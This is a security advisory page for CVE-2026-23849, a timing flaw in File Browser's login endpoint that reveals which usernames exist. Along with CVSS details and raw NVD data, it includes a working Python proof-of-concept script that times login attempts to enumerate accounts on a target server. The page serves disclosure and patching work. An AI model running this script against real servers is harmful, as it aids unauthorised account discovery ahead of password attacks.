Security Vulnerability Report
中文
CVE-2026-23849 CVSS 5.3 MEDIUM

CVE-2026-23849

Published: 2026-01-19 21:15:52
Last Modified: 2026-02-03 14:30:45
Source: [email protected]

Description

File Browser provides a file managing interface within a specified directory and can be used to upload, delete, preview, rename, and edit files. Prior to version 2.55.0, the JSONAuth. Auth function contains a logic flaw that allows unauthenticated attackers to enumerate valid usernames by measuring the response time of the /api/login endpoint. The vulnerability exists due to a "short-circuit" evaluation in the authentication logic. When a username is not found in the database, the function returns immediately. However, if the username does exist, the code proceeds to verify the password using bcrypt (users.CheckPwd), which is a computationally expensive operation designed to be slow. This difference in execution path creates a measurable timing discrepancy. Version 2.55.0 contains a patch for the issue.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:* - VULNERABLE
File Browser (filebrowser) < 2.55.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time import statistics TARGET_URL = "http://target-server/api/login" TEST_USERNAMES = ["admin", "user", "test", "guest", "root"] NUM_REQUESTS = 10 def measure_response_time(username): """Measure average response time for a username""" times = [] for _ in range(NUM_REQUESTS): start = time.time() response = requests.post(TARGET_URL, json={ "username": username, "password": "wrong_password" }) end = time.time() times.append(end - start) return statistics.mean(times) def enumerate_usernames(): """Enumerate valid usernames using timing attack""" results = {} for username in TEST_USERNAMES: avg_time = measure_response_time(username) results[username] = avg_time print(f"Username: {username}, Avg Time: {avg_time:.4f}s") # Identify likely valid usernames (longer response time) threshold = statistics.mean(results.values()) + statistics.stdev(results.values()) valid_usernames = [u for u, t in results.items() if t > threshold] print(f"\nLikely valid usernames: {valid_usernames}") return valid_usernames if __name__ == "__main__": enumerate_usernames()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23849", "sourceIdentifier": "[email protected]", "published": "2026-01-19T21:15:51.653", "lastModified": "2026-02-03T14:30:45.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File Browser provides a file managing interface within a specified directory and can be used to upload, delete, preview, rename, and edit files. Prior to version 2.55.0, the JSONAuth. Auth function contains a logic flaw that allows unauthenticated attackers to enumerate valid usernames by measuring the response time of the /api/login endpoint. The vulnerability exists due to a \"short-circuit\" evaluation in the authentication logic. When a username is not found in the database, the function returns immediately. However, if the username does exist, the code proceeds to verify the password using bcrypt (users.CheckPwd), which is a computationally expensive operation designed to be slow. This difference in execution path creates a measurable timing discrepancy. Version 2.55.0 contains a patch for the issue."}, {"lang": "es", "value": "El Navegador de Archivos proporciona una interfaz de gestión de archivos dentro de un directorio especificado y puede ser utilizado para subir, eliminar, previsualizar, renombrar y editar archivos. Antes de la versión 2.55.0, la función JSONAuth. Auth contiene un fallo lógico que permite a atacantes no autenticados enumerar nombres de usuario válidos midiendo el tiempo de respuesta del endpoint /api/login. La vulnerabilidad existe debido a una evaluación de 'cortocircuito' en la lógica de autenticación. Cuando un nombre de usuario no se encuentra en la base de datos, la función devuelve inmediatamente. Sin embargo, si el nombre de usuario sí existe, el código procede a verificar la contraseña usando bcrypt (users.CheckPwd), que es una operación computacionalmente costosa diseñada para ser lenta. Esta diferencia en la ruta de ejecución crea una discrepancia de tiempo medible. La versión 2.55.0 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-208"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-203"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.55.0", "matchCriteriaId": "36CB8D4B-1DFD-4F56-81BD-E31B346B0CE5"}]}]}], "references": [{"url": "https://github.com/filebrowser/filebrowser/commit/24781badd413ee20333aba5cce1919d676e01889", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-43mm-m3h2-3prc", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.